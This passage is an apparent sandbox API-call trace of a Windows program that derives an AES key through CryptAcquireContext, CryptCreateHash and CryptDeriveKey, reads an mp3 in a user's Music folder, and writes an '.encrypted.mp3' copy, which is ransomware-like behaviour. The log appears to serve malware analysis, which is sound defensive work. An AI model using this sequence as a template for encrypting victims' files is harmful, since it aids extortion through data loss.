0x8899b8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.939] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.940] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.940] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.940] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.940] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.941] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x731a870, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 0x7c2100 [0037.941] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.941] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.941] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.941] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.941] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.941] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.941] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.941] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.941] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.942] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.942] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.942] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.942] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.942] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.942] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.942] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.943] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.943] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.944] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.944] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.944] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.945] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.945] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.945] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0037.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.945] CryptDestroyHash (hHash=0x7c2240) returned 1 [0037.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\fxfiitiq48pqw.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.946] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.946] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\fxfiitiq48pqw.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.947] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.947] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x3d1d, lpOverlapped=0x0) returned 1 [0037.948] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d1d) returned 0xac0018 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d1d) returned 0xac3d40 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.949] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d1d) returned 0xac0018 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.949] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0037.949] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 